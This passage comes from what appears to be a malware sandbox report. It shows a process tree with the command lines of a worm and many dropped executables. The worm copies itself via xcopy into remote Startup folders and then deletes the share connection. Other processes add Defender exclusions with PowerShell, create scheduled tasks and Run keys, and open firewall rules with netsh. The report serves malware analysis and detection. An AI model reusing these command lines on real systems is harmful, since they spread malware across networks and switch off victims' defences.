        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1772
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:8056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5856
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7828
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6344
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6864
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5268
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6808
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6580
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:6168
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4636
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:3816
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:7360
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3476
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2848
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2152
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5616
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3396
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7620
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "
        6⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"
        7⤵
        
        PID:5788
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:3400
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        Runs ping.exe
        
        PID:5336
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4892
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5848
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7352
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5912
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1224
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6228
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3716
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:8076
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5788
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:484
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3752
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6476
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4400
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1444
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6976
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7136
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:6336
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:2780
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4696
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7520
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6268
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3624
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3780
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7684
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "
        6⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"
        7⤵
        
        PID:1912
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:7504
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        
        PID:7436
- - C:\Users\Admin\AppData\Local\Temp\a\z.exe
    "C:\Users\Admin\AppData\Local\Temp\a\z.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5208
- - C:\Users\Admin\AppData\Local\Temp\a\steam.exe
    "C:\Users\Admin\AppData\Local\Temp\a\steam.exe"
    3⤵
    - Executes dropped EXE
    PID:5216
  - - C:\Users\Public\Discord.exe
      "C:\Users\Public\Discord.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      PID:6008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Discord.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Discord.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3580
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Public\Discord.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3032
  - - C:\Users\Public\Steam.exe
      "C:\Users\Public\Steam.exe"
      4⤵
      Executes dropped EXE
      PID:4260
- - C:\Users\Admin\AppData\Local\Temp\a\bitcoin3000.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bitcoin3000.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:6084
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c appbitcoin.bat
      4⤵
      PID:2704
- - C:\Users\Admin\AppData\Local\Temp\a\savedecrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\a\savedecrypter.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:904
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "UDP Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp906D.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5816
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "UDP Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp90BC.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5708
- - C:\Users\Admin\AppData\Local\Temp\a\Update.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:1596
  - - C:\Users\Admin\AppData\Roaming\Update.exe
      "C:\Users\Admin\AppData\Roaming\Update.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:5628
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Update.exe" "Update.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4240
- - C:\Users\Admin\AppData\Local\Temp\a\cann.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cann.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:6024
  - - C:\Windows\SysWOW64\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cann.exe"
      4⤵
      PID:1604
- - C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2432
  - - C:\Windows\WindowsServices.exe
      "C:\Windows\WindowsServices.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:5620
- - C:\Users\Admin\AppData\Local\Temp\a\bin2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bin2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5888
  - - C:\Users\Admin\AppData\Local\Temp\a\bin2Srv.exe
      C:\Users\Admin\AppData\Local\Temp\a\bin2Srv.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 320
        5⤵
        Program crash
        
        PID:5488
- - C:\Users\Admin\AppData\Local\Temp\a\cHSzTDjVl.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cHSzTDjVl.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2792
- - C:\Users\Admin\AppData\Local\Temp\a\ServerX.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ServerX.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1668
  - - C:\Users\Admin\AppData\Roaming\server.exe
      "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious behavior: GetForegroundWindowSpam
      PID:5488
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:6128
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5676
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4728
- - C:\Users\Admin\AppData\Local\Temp\a\LinkedinTuVanDat.exe
    "C:\Users\Admin\AppData\Local\Temp\a\LinkedinTuVanDat.exe"
    3⤵
    - Executes dropped EXE
    PID:5660
- - C:\Users\Admin\AppData\Local\Temp\a\sas.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sas.exe"
    3⤵
    - Executes dropped EXE
    PID:4280
- - C:\Users\Admin\AppData\Local\Temp\a\giania.exe
    "C:\Users\Admin\AppData\Local\Temp\a\giania.exe"
    3⤵
    - Executes dropped EXE
    PID:5820
- - C:\Users\Admin\AppData\Local\Temp\a\code.exe
    "C:\Users\Admin\AppData\Local\Temp\a\code.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5800
- - C:\Users\Admin\AppData\Local\Temp\a\laserrr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\laserrr.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    PID:5564
  - - C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe
      "C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:8084
- - C:\Users\Admin\AppData\Local\Temp\a\pure.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pure.exe"
    3⤵
    - Executes dropped EXE
    PID:5624
- - C:\Users\Admin\AppData\Local\Temp\a\GRAW.exe
    "C:\Users\Admin\AppData\Local\Temp\a\GRAW.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6348
- - C:\Users\Admin\AppData\Local\Temp\a\svc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svc.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    PID:8052
  - - C:\Users\Admin\AppData\Local\Temp\temp_22197.exe
      "C:\Users\Admin\AppData\Local\Temp\temp_22197.exe"
      4⤵
      Executes dropped EXE
      PID:8
    - - C:\Users\Admin\AppData\Local\Temp\temp_22197.exe
        
        "C:\Users\Admin\AppData\Local\Temp\temp_22197.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:7040
  - - C:\Users\Admin\AppData\Local\Temp\temp_22207.exe
      "C:\Users\Admin\AppData\Local\Temp\temp_22207.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:6716
  - - C:\Users\Admin\AppData\Local\Temp\temp_22213.exe
      "C:\Users\Admin\AppData\Local\Temp\temp_22213.exe"
      4⤵
      Executes dropped EXE
      PID:6260
- - C:\Users\Admin\AppData\Local\Temp\a\laser.exe
    "C:\Users\Admin\AppData\Local\Temp\a\laser.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6092
- - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7836
  - - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
      4⤵
      Executes dropped EXE
      PID:6964
  - - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      PID:5036
  - - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
      4⤵
